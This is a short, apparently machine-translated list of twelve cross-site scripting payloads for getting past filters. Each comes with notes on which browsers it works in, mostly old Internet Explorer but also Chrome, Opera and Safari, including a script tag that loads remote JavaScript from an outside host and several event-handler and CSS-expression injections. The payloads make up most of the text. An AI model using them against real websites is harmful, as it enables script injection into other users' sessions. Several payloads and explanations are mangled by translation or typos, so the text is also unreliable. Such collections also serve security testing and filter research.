12 Interesting XSS vectors

XSS Vector #1

<script src=/?20.rs></script>

The second slash in the URL under Internet Explorer (tested on IE11) can be replaced by u+3031,u+3033,u+3035,u+309d,u+30fc,u+30fd,u+ff70. In a specific environment, you can help the tester bypass some of the regular.

XSS Vector #2

<script src=//20.rs async>

This vector can normally invoke remote JavaScript under IE (test in IE11) without closing the script tag. Not only can you effectively bypass some of the boring regular, but also can help you shorten your payload. BTW, this has nothing to do with the occurrence of other script tags that will cause the current payload to be closed.

XSS Vector #3

<div style="x:/**/ression (Alert (1)) (' \ ') exp\ ')">

ie a CSS Parse BUG. In certain situations, you may be able to help bypass some XSS defenses. by @gainover

XSS Vector #4

<script>/*@cc_on alert (1) @*/</script>

When the output point is between the multiline gaze symbol, the cut cannot end the script tag, the vector can be used under IE (IE version 10 or before) to successfully XSS.

XSS Vector #5

<base href="javascript:\" ><a href="//%0aalert (1); // ">click me</a>

The vector was released recently by @irsdl. The test is valid under Chrome.

XSS Vector #6

<title>&lt;img src=1 onerror=alert (1) &gt;</title> div.innerhtml = document.getElementsByTagName ("title") [0//  IE8, Already-known?

Another MXSS under IE8, recently released by @hasegawayosuke on Twitter.

XSS Vector #7

<picture><source srcset=1>1) >

Recently launched by. Mario on Twitter. The test is valid under Chrome Canary.

XSS Vector #8

<script>'+{valueof:location, Tostring:[].join,0:'javascript:prompt%281% ",length:1}</script>

This is indeed a rehash. But few people mention it. The vector is also valid only under IE. The advantage is that no equals and parentheses are required. This means that in some cases you can simply bypass some impractical XSS filter and then construct your valid POC.

XSS Vector #9

<meta http-equiv="x-ua-compatible" content="ie=9; "><% onclick=alert (1) >click me

The vector is valid only in IE9. You can see that the left angle bracket is not followed by a letter. But in IE9 this is still considered to be a valid label. As we understand most of the unknown tags, we can use the OnClick and Onmouse series event handler for XSS cross-site attacks in those inexplicable tags. As for what can be brought to the beholder.

XSS Vector #10

<script>alert '1' </script>

ES6 new features. You can use Backtick instead of parentheses. Tested in Firefox Nightly.

XSS Vector #11

<input Onresize=alert (1) >

This should be the shortest vector for the input tag. is valid under IE10. Automatic triggering is possible without autofocus for secondary and user interaction. It is an option when autofocus is filtered and cannot be overridden by type. In addition, there are several event handler that can be used for the use of autofocus vectors except for the onblur,onfocus we know.

<iframe src= is an XSS page .htm>

Pages that are XSS. htm

<input Onactivate=alert (2) autofocus>

<input Onbeforeactivate=alert (5) autofocus>

Valid under IE10 and IE11. Of course, if we can write type=image we can also use event handler such as Onload,onerror.

XSS Vector #12

<iframe src=test.htm> <input Type=hidden style=x:expression (Alert (1)) > tested at ie6-9 by @ Sogili

<form><input Type=hidden Onforminput=alert ('what? ') ><input></form> tested on Opera12

<svg><input Type=hidden Onload=alert (1// tested on safari7.0.6

Some are cold, some require user interaction, some you may not think of as bypass. The beholder. The focus of the vector is Type=hidden.

12 Interesting XSS vectors